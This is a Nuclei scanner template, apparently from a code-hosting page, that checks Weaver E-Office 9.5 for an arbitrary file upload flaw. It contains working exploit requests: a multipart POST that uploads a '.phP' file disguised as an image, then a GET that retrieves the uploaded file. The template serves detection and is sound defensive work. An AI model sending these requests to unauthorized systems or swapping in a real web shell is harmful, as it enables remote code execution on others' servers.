66 lines
2.0 KiB
YAML
66 lines
2.0 KiB
YAML
id: weaver-eoffice-file-upload
|
|
|
|
info:
|
|
name: Weaver E-Office v9.5 - Arbitrary File Upload
|
|
author: princechaddha
|
|
severity: high
|
|
description: |
|
|
Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
|
|
reference:
|
|
- https://github.com/RCEraser/cve/blob/main/Weaver.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="泛微-EOffice"
|
|
product: e-office
|
|
vendor: weaver
|
|
tags: e-office,weaver,intrusive,file-upload
|
|
classification:
|
|
cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
|
|
variables:
|
|
filename: '{{rand_base(7, "abc")}}'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
|
|
|
|
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
|
|
Content-Disposition: form-data; name="upload_quwan"; filename="{{filename}}.phP"
|
|
Content-Type: image/jpeg
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
|
|
Content-Disposition: form-data; name="file"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
|
|
- |
|
|
GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- '{{randstr}}'
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: id
|
|
part: body
|
|
group: 1
|
|
internal: true
|
|
regex:
|
|
- '\\\/attachment\\\/([0-9]+)\\\/'
|
|
|
|
# digest: 4b0a00483046022100cb2ea659985e0e6a70be38ce3127d612a7bb63b072df2cb43e4efe695bd304b0022100d305f452c2f830e004937b472bc867c5d0e8feab8e0846a113a5d8a5e163c33b:922c64590222798bb761d5b6d8e72950
|